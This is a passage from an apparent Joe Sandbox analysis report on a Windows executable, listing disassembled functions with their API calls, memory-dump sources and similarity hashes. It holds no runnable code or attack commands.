Opcode Fuzzy Hash: 3f3571743ae8bb518db273e1d5473214efdc558287c9048febf32fba17a38326
Instruction Fuzzy Hash: 68E04830804208AADF106FA1CE499AE3A64AF00341F144439F9957B0D1E6F8C4816745

Function 00406255 Relevance: 1.5, APIs: 1, Instructions: 19registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.KERNELBASE(00000000,00000000,00000000,?,?,?,?,?,004062E3,?,00000000,?,?,Call,?), ref: 00406279

Memory Dump Source

Source File: 00000000.00000002.1346983075.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1346932479.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347049760.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347209553.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347209553.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347209553.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347209553.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347209553.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347209553.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347593091.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_KO0q4biYfC.jbxd

Similarity

API ID: Open
String ID:
API String ID: 71445658-0
Opcode ID: a8e94fdf895113144ef30ac0413fc9f69bed743b5e5124c6f76e238eb3875bc5
Instruction ID: 7481b87947078d819ae160a747d33610cb99cd3c2235475b1dc937127606ac98
Opcode Fuzzy Hash: a8e94fdf895113144ef30ac0413fc9f69bed743b5e5124c6f76e238eb3875bc5
Instruction Fuzzy Hash: C1D0123210420DBBDF11AE90DD01FAB372DAF14714F114826FE06A4091D775D530AB14

Function 004015A3 Relevance: 1.5, APIs: 1, Instructions: 18COMMON

Download Yara Rule

APIs

SetFileAttributesW.KERNELBASE(00000000,?,?), ref: 004015AE

Memory Dump Source

Source File: 00000000.00000002.1346983075.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1346932479.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347049760.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347209553.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347209553.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347209553.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347209553.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347209553.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347209553.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347593091.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_KO0q4biYfC.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: a6d18c98ee21f5be52796325d469c1a2d185cd06dd69ecfff736ff996b69b5af
Instruction ID: 5499d889e10e12284ba9d0e0803ee079e3e67a5a0dd97beb148b5d1e1bc1fcbb
Opcode Fuzzy Hash: a6d18c98ee21f5be52796325d469c1a2d185cd06dd69ecfff736ff996b69b5af
Instruction Fuzzy Hash: E7D01232B04100D7DB10DBA4AF4899D73A49B44369B304677E502F11D0D6B9D9519A2D

Function 004043AB Relevance: 1.5, APIs: 1, Instructions: 9windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00000000,00000000,00000000), ref: 004043BD

Memory Dump Source

Source File: 00000000.00000002.1346983075.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1346932479.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347049760.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347209553.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347209553.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347209553.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347209553.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347209553.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347209553.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347593091.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_KO0q4biYfC.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: a452b7de42f14c8de3af57d1a741f17fe5c7e0b0fce0339b2d36eea9d11f7e20
Instruction ID: f8057fa4cd378f1a8adf26ed8b17c038a4feeda265d9f6fa174188bdeaa95141
Opcode Fuzzy Hash: a452b7de42f14c8de3af57d1a741f17fe5c7e0b0fce0339b2d36eea9d11f7e20
Instruction Fuzzy Hash: 1FC04C71780200BADA208BA49D85F0677545790700F1495797640E50E4C674D460D66C

Function 0040345D Relevance: 1.5, APIs: 1, Instructions: 6COMMON

Download Yara Rule

APIs

SetFilePointer.KERNELBASE(00000000,00000000,00000000,0040315B,?), ref: 0040346B

Memory Dump Source

Source File: 00000000.00000002.1346983075.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1346932479.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347049760.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347209553.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347209553.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347209553.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347209553.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347209553.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347209553.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347593091.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_KO0q4biYfC.jbxd

Similarity

API ID: FilePointer
String ID:
API String ID: 973152223-0
Opcode ID: d5a77a7b91dde00220c09aa0a832f43c90240fc94845358d4caa889c1b96a79f
Instruction ID: c7266a3154837caca095f11e7777f6dda2278cbf6cff4ee7664d3894fc3aa091
Opcode Fuzzy Hash: d5a77a7b91dde00220c09aa0a832f43c90240fc94845358d4caa889c1b96a79f
Instruction Fuzzy Hash: ECB01271240300BFDA214F00DF09F057B21AB90700F10C034B348380F086711035EB0D

Function 00405A14 Relevance: 1.5, APIs: 1, Instructions: 6COMMON

Download Yara Rule

APIs

ShellExecuteExW.SHELL32(?), ref: 00405A23

Memory Dump Source

Source File: 00000000.00000002.1346983075.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1346932479.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347049760.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347209553.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347209553.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347209553.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347209553.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347209553.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347209553.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347593091.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_KO0q4biYfC.jbxd

Similarity

API ID: ExecuteShell
String ID:
API String ID: 587946157-0
Opcode ID: 635164c3b06ed96bf07ad63cc2cf624e21a1ddaff933affe27173adac056c9f0
Instruction ID: 322818d701d9cc3fc85427ca8463de8bac6637280c84b784c1803e53dd53602d
Opcode Fuzzy Hash: 635164c3b06ed96bf07ad63cc2cf624e21a1ddaff933affe27173adac056c9f0
Instruction Fuzzy Hash: 55C092B2000200DFE301CF90CB08F067BF8AF59306F028058E1849A160C7788800CB69

Function 00404394 Relevance: 1.5, APIs: 1, Instructions: 6windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,?,00000001,004041BF), ref: 004043A2

Memory Dump Source

Source File: 00000000.00000002.1346983075.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1346932479.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347049760.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347209553.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347209553.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347209553.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347209553.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347209553.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347209553.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347593091.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_KO0q4biYfC.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: bd7e8dc2c5871e064c502d82a01b6574672f0de651032f207fd53ed2aa40cebc
Instruction ID: e4171d0a4592585bcf4a2ca6fb2eaed9aff33c093be5cb9cf1e9125a9c9e1139
Opcode Fuzzy Hash: bd7e8dc2c5871e064c502d82a01b6574672f0de651032f207fd53ed2aa40cebc
Instruction Fuzzy Hash: 0EB09235290600ABDE214B40DE49F457A62E7A4701F008178B240640B0CAB200A1DB19

Function 00404381 Relevance: 1.5, APIs: 1, Instructions: 4COMMON

Download Yara Rule

APIs

KiUserCallbackDispatcher.NTDLL(?,00404158), ref: 0040438B

Memory Dump Source

Source File: 00000000.00000002.1346983075.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1346932479.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347049760.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347209553.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347209553.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347209553.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347209553.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347209553.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347209553.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347593091.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_KO0q4biYfC.jbxd

Similarity

API ID: CallbackDispatcherUser
String ID:
API String ID: 2492992576-0
Opcode ID: edeae3ac3cfecc704656ce7adf69815daf45002a40afc9e9c99c0eaf63a7b25e
Instruction ID: bc9b5adeae0d36b04141253452f110da710a6babf688c590b829c7787f218d6b
Opcode Fuzzy Hash: edeae3ac3cfecc704656ce7adf69815daf45002a40afc9e9c99c0eaf63a7b25e
Instruction Fuzzy Hash: 34A002B65445009BCE119F50DF05805BA71F7E47417518479A155510348A354561EB19

Function 73C6121B Relevance: 1.3, APIs: 1, Instructions: 6memoryCOMMON

Download Yara Rule

APIs

GlobalAlloc.KERNELBASE(?,?,73C6123B,?,73C612DF,00000019,73C611BE,-000000A0), ref: 73C61225

Memory Dump Source

Source File: 00000000.00000002.1397177339.0000000073C61000.00000020.00000001.01000000.00000006.sdmp, Offset: 73C60000, based on PE: true

Associated: 00000000.00000002.1396201484.0000000073C60000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1397405949.0000000073C64000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1399176376.0000000073C66000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_73c60000_KO0q4biYfC.jbxd

Similarity

API ID: AllocGlobal
String ID:
API String ID: 3761449716-0
Opcode ID: d4695aee10800d336d52caf8fa3b67adfcef965dc0b453e9b4ae141c066f8da1
Instruction ID: 0ee4f3404d497d2a4800d1e7967e183154503347f63ee3b39ac1fb6d6e09fdf5
Opcode Fuzzy Hash: d4695aee10800d336d52caf8fa3b67adfcef965dc0b453e9b4ae141c066f8da1
Instruction Fuzzy Hash: 00B002B2A44550DFEE40EB67CD46F353654E744705F644050F709DD1C5D564DC148575

Non-executed Functions

Function 00404DCC Relevance: 63.5, APIs: 33, Strings: 3, Instructions: 481windowmemoryCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000003F9), ref: 00404DE4
GetDlgItem.USER32(?,?), ref: 00404DEF
GlobalAlloc.KERNEL32(?,?), ref: 00404E39
LoadBitmapW.USER32(0000006E), ref: 00404E4C
SetWindowLongW.USER32(?,?,004053C4), ref: 00404E65
ImageList_Create.COMCTL32(?,?,00000021,00000006,00000000), ref: 00404E79
ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404E8B
SendMessageW.USER32(?,00001109,00000002), ref: 00404EA1
SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404EAD
SendMessageW.USER32(?,0000111B,?,00000000), ref: 00404EBF
DeleteObject.GDI32(00000000), ref: 00404EC2
SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404EED
SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404EF9
SendMessageW.USER32(?,00001132,00000000,?), ref: 00404F8F
SendMessageW.USER32(?,0000110A,00000003,00000000), ref: 00404FBA
SendMessageW.USER32(?,00001132,00000000,?), ref: 00404FCE
GetWindowLongW.USER32(?,?), ref: 00404FFD
SetWindowLongW.USER32(?,?,00000000), ref: 0040500B
ShowWindow.USER32(?,00000005), ref: 0040501C
SendMessageW.USER32(?,00000419,00000000,?), ref: 00405119
SendMessageW.USER32(?,00000147,00000000,00000000), ref: 0040517E
SendMessageW.USER32(?,?,00000000,00000000), ref: 00405193
SendMessageW.USER32(?,?,00000000,?), ref: 004051B7
SendMessageW.USER32(?,00000200,00000000,00000000), ref: 004051D7
ImageList_Destroy.COMCTL32(?), ref: 004051EC
GlobalFree.KERNEL32(?), ref: 004051FC
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00405275
SendMessageW.USER32(?,00001102,?,?), ref: 0040531E
SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 0040532D
InvalidateRect.USER32(?,00000000,00000001), ref: 0040534D
ShowWindow.USER32(?,00000000), ref: 0040539B
GetDlgItem.USER32(?,000003FE), ref: 004053A6
ShowWindow.USER32(00000000), ref: 004053AD

Strings

M, xrefs: 00404F76
, xrefs: 00405385
N, xrefs: 00405057

Memory Dump Source

Source File: 00000000.00000002.1346983075.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1346932479.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347049760.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347209553.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347209553.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347209553.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347209553.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347209553.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347209553.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347593091.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_KO0q4biYfC.jbxd

Similarity

API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
String ID: $M$N
API String ID: 1638840714-813528018
Opcode ID: fb644b25ca39ae204efa7e1d1243337108994715b0d322cb34e58838b66aab8b
Instruction ID: 7f687e55a7f93217ddba54fde82f382d197ef8b4c31ab339cf60f2545021b201
Opcode Fuzzy Hash: fb644b25ca39ae204efa7e1d1243337108994715b0d322cb34e58838b66aab8b
Instruction Fuzzy Hash: DD028DB0A00609EFDF209F94CD85AAE7BB5FB44354F10807AE611BA2E0C7798D52CF58

Function 00404850 Relevance: 24.8, APIs: 10, Strings: 4, Instructions: 275stringCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000003FB), ref: 0040489F
SetWindowTextW.USER32(00000000,?), ref: 004048C9
SHBrowseForFolderW.SHELL32(?), ref: 0040497A
CoTaskMemFree.OLE32(00000000), ref: 00404985
lstrcmpiW.KERNEL32(Call,00423728,00000000,?,?), ref: 004049B7
lstrcatW.KERNEL32(?,Call), ref: 004049C3
SetDlgItemTextW.USER32(?,000003FB,?), ref: 004049D5

Part of subcall function 00405A32: GetDlgItemTextW.USER32(?,?,?,00404A0C), ref: 00405A45

Part of subcall function 0040667C: CharNextW.USER32(?,*?|<>/":,00000000,00000000,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,"C:\Users\user\Desktop\KO0q4biYfC.exe",00403480,C:\Users\user~1\AppData\Local\Temp\,771B3420,004036EF,?,00000006,?,0000000A), ref: 004066DF
Part of subcall function 0040667C: CharNextW.USER32(?,?,?,00000000,?,00000006,?,0000000A), ref: 004066EE
Part of subcall function 0040667C: CharNextW.USER32(?,00000000,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,"C:\Users\user\Desktop\KO0q4biYfC.exe",00403480,C:\Users\user~1\AppData\Local\Temp\,771B3420,004036EF,?,00000006,?,0000000A), ref: 004066F3
Part of subcall function 0040667C: CharPrevW.USER32(?,?,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,"C:\Users\user\Desktop\KO0q4biYfC.exe",00403480,C:\Users\user~1\AppData\Local\Temp\,771B3420,004036EF,?,00000006,?,0000000A), ref: 00406706

GetDiskFreeSpaceW.KERNEL32(004216F8,?,?,0000040F,?,004216F8,004216F8,?,00000001,004216F8,?,?,000003FB,?), ref: 00404A98
MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404AB3

Part of subcall function 00404C0C: lstrlenW.KERNEL32(00423728,00423728,?,%u.%u%s%s,00000005,00000000,00000000,?,?,00000000,?,000000DF,00000000,00000400,?), ref: 00404CAD
Part of subcall function 00404C0C: wsprintfW.USER32 ref: 00404CB6
Part of subcall function 00404C0C: SetDlgItemTextW.USER32(?,00423728), ref: 00404CC9

Strings

(7B, xrefs: 0040494D
A, xrefs: 00404973
C:\Users\user\AppData\Roaming\brugser\brugo, xrefs: 004049A0
Call, xrefs: 004049B1, 004049B6, 004049C1

Memory Dump Source

Source File: 00000000.00000002.1346983075.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1346932479.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347049760.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347209553.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347209553.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347209553.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347209553.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347209553.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347209553.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347593091.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_KO0q4biYfC.jbxd

Similarity

API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
String ID: (7B$A$C:\Users\user\AppData\Roaming\brugser\brugo$Call
API String ID: 2624150263-2438073506
Opcode ID: 60ed21fe2f328070877fcf4fb1291f079d9e461e65f212612ce38389da6d49e8
Instruction ID: 217fbe9c53fcac7a38d38ba6b36a95d3c52d9e466bb1b0d29fe77156d884dce9
Opcode Fuzzy Hash: 60ed21fe2f328070877fcf4fb1291f079d9e461e65f212612ce38389da6d49e8
Instruction Fuzzy Hash: 01A161F1A00205ABDB11EFA5C985AAF77B8EF84315F10803BF611B62D1D77C9A418B6D

Function 00402868 Relevance: 1.5, APIs: 1, Instructions: 30fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(00000000,?,00000002), ref: 00402877

Memory Dump Source

Source File: 00000000.00000002.1346983075.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1346932479.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347049760.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347209553.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347209553.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347209553.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347209553.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347209553.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347209553.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347593091.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_KO0q4biYfC.jbxd

Similarity

API ID: FileFindFirst
String ID:
API String ID: 1974802433-0
Opcode ID: 6fd2962910cdf18594a7907c322fc030c9e7a26b232b9d9b5d327205302d7dac
Instruction ID: e6f127318fd58302517648c6e406f49d0db104963aa8d987e753e5cb7f87edca
Opcode Fuzzy Hash: 6fd2962910cdf18594a7907c322fc030c9e7a26b232b9d9b5d327205302d7dac
Instruction Fuzzy Hash: EDF08271A14104EBDB10DBA4DA499AEB378EF14314F60467BF545F21E0DBB45D809B2A

Function 0040451E Relevance: 37.0, APIs: 19, Strings: 2, Instructions: 204windowstringCOMMON

Download Yara Rule

APIs

CheckDlgButton.USER32(?,-0000040A,00000001), ref: 004045BC
GetDlgItem.USER32(?,?), ref: 004045D0
SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 004045ED
GetSysColor.USER32(?), ref: 004045FE
SendMessageW.USER32(00000000,00000443,00000000,?), ref: 0040460C
SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 0040461A
lstrlenW.KERNEL32(?), ref: 0040461F
SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 0040462C
SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 00404641
GetDlgItem.USER32(?,0000040A), ref: 0040469A
SendMessageW.USER32(00000000), ref: 004046A1
GetDlgItem.USER32(?,?), ref: 004046CC
SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 0040470F
LoadCursorW.USER32(00000000,00007F02), ref: 0040471D
SetCursor.USER32(00000000), ref: 00404720
LoadCursorW.USER32(00000000,00007F00), ref: 00404739
SetCursor.USER32(00000000), ref: 0040473C
SendMessageW.USER32(00000111,00000001,00000000), ref: 0040476B
SendMessageW.USER32(?,00000000,00000000), ref: 0040477D

Strings

Call, xrefs: 004046FB
N, xrefs: 004046BA

Memory Dump Source

Source File: 00000000.00000002.1346983075.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1346932479.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347049760.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347209553.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347209553.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347209553.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347209553.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347209553.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347209553.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347593091.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_KO0q4biYfC.jbxd

Similarity

API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
String ID: Call$N
API String ID: 3103080414-3438112850
Opcode ID: c2d943e7d3074a80d89972f065d7b0d6c6867904808fb573d17a53c74c23d30b
Instruction ID: 26ae409e5f73424340e4bb55f347a499eb46e427c8d4328441e026d38e95c6c2
Opcode Fuzzy Hash: c2d943e7d3074a80d89972f065d7b0d6c6867904808fb573d17a53c74c23d30b
Instruction Fuzzy Hash: 4B6173B1900209BFDB109F60DD85EAA7B69FB84314F00853AFB05772E0D7789D52CB58

Function 00401000 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 125COMMON

Download Yara Rule

APIs

DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
BeginPaint.USER32(?,?), ref: 00401047
GetClientRect.USER32(?,?), ref: 0040105B
CreateBrushIndirect.GDI32(00000000), ref: 004010CF
FillRect.USER32(00000000,?,00000000), ref: 004010E4
DeleteObject.GDI32(?), ref: 004010ED
CreateFontIndirectW.GDI32(?), ref: 00401105
SetBkMode.GDI32(00000000,00000001), ref: 00401126
SetTextColor.GDI32(00000000,000000FF), ref: 00401130
SelectObject.GDI32(00000000,?), ref: 00401140
DrawTextW.USER32(00000000,00429240,000000FF,00000010,00000820), ref: 00401156
SelectObject.GDI32(00000000,00000000), ref: 00401160
DeleteObject.GDI32(?), ref: 00401165
EndPaint.USER32(?,?), ref: 0040116E

Strings

F, xrefs: 0040100C

Memory Dump Source

Source File: 00000000.00000002.1346983075.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1346932479.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347049760.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347209553.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347209553.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347209553.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347209553.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347209553.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347209553.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347593091.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_KO0q4biYfC.jbxd

Similarity

API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
String ID: F
API String ID: 941294808-1304234792
Opcode ID: a62f14d8607f0cab4b909ce482175ba86ddefa50def87cd09a38214d4056f576
Instruction ID: b35030fe9107d9a8359b932f7918d2348922827c9ca57aaae851fe5b21190c6b
Opcode Fuzzy Hash: a62f14d8607f0cab4b909ce482175ba86ddefa50def87cd09a38214d4056f576
